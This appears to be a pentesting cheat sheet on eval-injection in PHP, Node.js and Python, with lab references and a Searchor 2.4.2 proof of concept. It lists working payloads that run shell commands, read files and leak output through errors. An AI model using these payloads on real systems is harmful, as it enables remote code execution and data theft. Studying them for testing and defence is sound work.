Exploiting 'eval' Function

Almost every language that we encounter during pentesting has an eval function that takes a string and executes it as code.

Such functions should be used sparingly, and user input must never reach them.

  • PHP Eval Function
<?php
$payload = "echo 'Hello, World!';";
eval($payload);
  • JavaScript/Node.js Eval Function
payload = 'console.log("Hello, World!")'
eval(payload)
  • Python Eval (or Exec) Function
payload = "print('Hello, World!')"
eval(payload)
exec(payload)

Node.js 'eval' function

glitch celestial node_eval

If the input is evaluated with eval, arbitrary code can be placed in it. Confirm the sink first with a harmless value in increasingly wrapped forms; each must give the same result:

  • Normal input: 5
  • Normal input wrapped: (()=>5)()
  • Normal input fully wrapped: (()=>{return 5})()
  • If all three behave the same, code can be added inside the arrow function body:
(() => {
  try {
    return `Output: ${require('child_process').execSync('whoami').toString()}`
  } catch (error) {
    return `Error executing command: ${error}`
  }
})()
// without spaces
(()=>{try{return(`Output:${require('child_process').execSync('whoami').toString()}`)}catch(error){return(`Error:${error}`)}})()

The return value is not always reflected, but if error messages are, throw the data inside an Error instead of returning it:

(()=>{throw new Error(require("child_process").execSync("whoami").toString())})()

Additional payloads (these assume a Node.js http/Express response object named res is in scope where the eval runs):

res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readFileSync('file').toString())

Python 'eval' function

Searchor 2.4.2

busqueda

PoC (python script).

$ onectf request -u URL -X POST -d 'engine=Yahoo' -p query -i '<q>, exec(""))#'

The payload closes the string literal and the call that the application wraps around query, comments out the rest of the line with #, and runs any Python placed inside exec("") on the server.


PHP 'eval' function

php_eval php_eval_advanced_filters_bypass

You can inject a function call such as phpinfo(); use ;// to terminate the statement and comment out whatever code the application appends after the payload. If the application wraps the payload in quotes, close the opening quote first and, when nothing is commented out, reopen a matching quote at the end so the remainder of the statement still parses.

<?php
$x = '';
eval('$x = "' . $payload . '";');
echo $x;

A few possible payloads:

$payload = '" . phpinfo() . "';        // evaluates: $x = "" . phpinfo() . "";
$payload = '" . phpinfo();//';         // evaluates: $x = "" . phpinfo();//";   (appended code commented out)
$payload = '" . system("whoami");//';  // a trailing " . " before ;// would leave a dangling operator and fail to parse

For payloads and filter bypass, refer to my PHP Cheatsheet.